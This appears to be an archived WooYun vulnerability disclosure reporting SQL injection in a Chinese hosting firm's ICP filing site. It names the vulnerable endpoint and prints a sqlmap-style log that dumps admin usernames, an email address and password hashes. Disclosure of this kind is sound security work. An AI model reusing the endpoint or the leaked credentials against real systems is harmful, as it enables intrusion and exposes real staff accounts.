当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128887

漏洞标题:时代互联ICP备案中心SQL注入可泄漏大量域名密码信息

相关厂商:广东时代互联科技有限公司

漏洞作者: kris

提交时间:2015-07-24 10:58

修复时间:2015-07-29 11:00

公开时间:2015-07-29 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-24: 细节已通知厂商并且等待厂商处理中
2015-07-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:


时代互联ICP备案中心SQL注入可泄漏大量域名密码信息

详细说明:

ICP备案中心某查询页面POST注入...
url : http://icp.now.cn:80/post.php

1.png

漏洞证明:

2-1.jpg


2-2.png


10:29:08] [INFO] the SQL query used returns 5 entries
[10:29:08] [INFO] retrieved: user_id
[10:29:08] [INFO] retrieved: smallint(5) unsigned
[10:29:08] [INFO] retrieved: user_name
[10:29:09] [INFO] retrieved: varchar(60)
[10:29:10] [INFO] retrieved: email
[10:29:11] [INFO] retrieved: varchar(60)
[10:29:11] [INFO] retrieved: password
[10:29:11] [INFO] retrieved: varchar(60)
[10:29:11] [INFO] retrieved: group_id
[10:29:11] [INFO] retrieved: int(11)
[10:29:11] [INFO] fetching entries of column(s) 'email, group_id, password, user_id, user_name' for table 'ba_admin_user' in database 'ICPQY'
[10:29:11] [INFO] the SQL query used returns 370 entries
[10:29:15] [INFO] retrieved: admin@now.net.cn
[10:29:15] [INFO] retrieved: 0
[10:29:15] [INFO] retrieved: 4e0a4a13f1762b27b19c8e68c6f4aba0
[10:29:15] [INFO] retrieved: 1
[10:29:16] [INFO] retrieved: admin
[10:29:16] [INFO] retrieved: 
[10:29:16] [INFO] retrieved: 4
[10:29:16] [INFO] retrieved: *FD571203974BA9AFE270FE62151AE967ECA5E0AA
[10:29:19] [INFO] retrieved: 13
[10:29:19] [INFO] retrieved: lxlin
[10:29:19] [INFO] retrieved: 
[10:29:19] [INFO] retrieved: 4
[10:29:19] [INFO] retrieved: *8BBF4106CB3918B2F82233E999FC5DE6967F2BE4
[10:29:20] [INFO] retrieved: 17
[10:29:20] [INFO] retrieved: lmw264
[10:29:20] [INFO] retrieved: 
[10:29:20] [INFO] retrieved: 4
[10:29:20] [INFO] retrieved: *A57E009B0989A6C292D631A2746203C89AD6A622
[10:29:20] [INFO] retrieved: 22
[10:29:21] [INFO] retrieved: alice123
[10:29:21] [INFO] retrieved: 
[10:29:21] [INFO] retrieved: 6
[10:29:21] [INFO] retrieved: *5674BFF6BC10AB7E9F26E4FA4B2F13ABB1489099
[10:29:21] [INFO] retrieved: 23
[10:29:21] [INFO] retrieved: liangjiahui
[10:29:22] [INFO] retrieved: 
[10:29:22] [INFO] retrieved: 4
[10:29:22] [INFO] retrieved: *8A7456881D02FB060B1C70935B339E345F357E5C
[10:29:25] [INFO] retrieved: 24
[10:29:25] [INFO] retrieved: yhui
[10:29:25] [INFO] retrieved: 
[10:29:25] [INFO] retrieved: 4
[10:29:25] [INFO] retrieved: *EA460F671BD6D754759024E4FBCCE3DFAA04AB1B
[10:29:26] [INFO] retrieved: 41
[10:29:26] [INFO] retrieved: zhangliping
[10:29:26] [INFO] retrieved: 
[10:29:26] [INFO] retrieved: 4
[10:29:27] [INFO] retrieved: *6BB831B0F81F1F56EC9B834A1714053977185692
[10:29:27] [INFO] retrieved: 84
[10:29:30] [INFO] retrieved: cheukwu
[10:29:31] [INFO] retrieved: 
[10:29:31] [INFO] retrieved: 4
[10:29:31] [INFO] retrieved: *FBF0116DB201C3473BBE2FD1245CD178D1C78EED
[10:29:31] [INFO] retrieved: 85
[10:29:31] [INFO] retrieved: zengbiao
[10:29:31] [INFO] retrieved: 
[10:29:31] [INFO] retrieved: 6
[10:29:31] [INFO] retrieved: *F228B54C6D2BED807FB850D66D9350CDAA2916D1


我很单纯,不深入。。。

修复方案:

你们懂的!!!

版权声明:转载请注明来源 kris@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-29 11:00

厂商回复:

漏洞Rank:18 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-24 11:15 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个企业是真不靠谱的

  2. 2015-07-29 11:35 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    这个平台,连主站,还有一个分站,总共有50多个sql注入,拿不下shell,@疯狗

  3. 2015-07-29 19:43 | 酷帥王子 ( 普通白帽子 | Rank:111 漏洞数:34 | 天朗日清,和风送闲,可叹那俊逸如我顾影自...)

    漏洞修补了么测试注入不存在了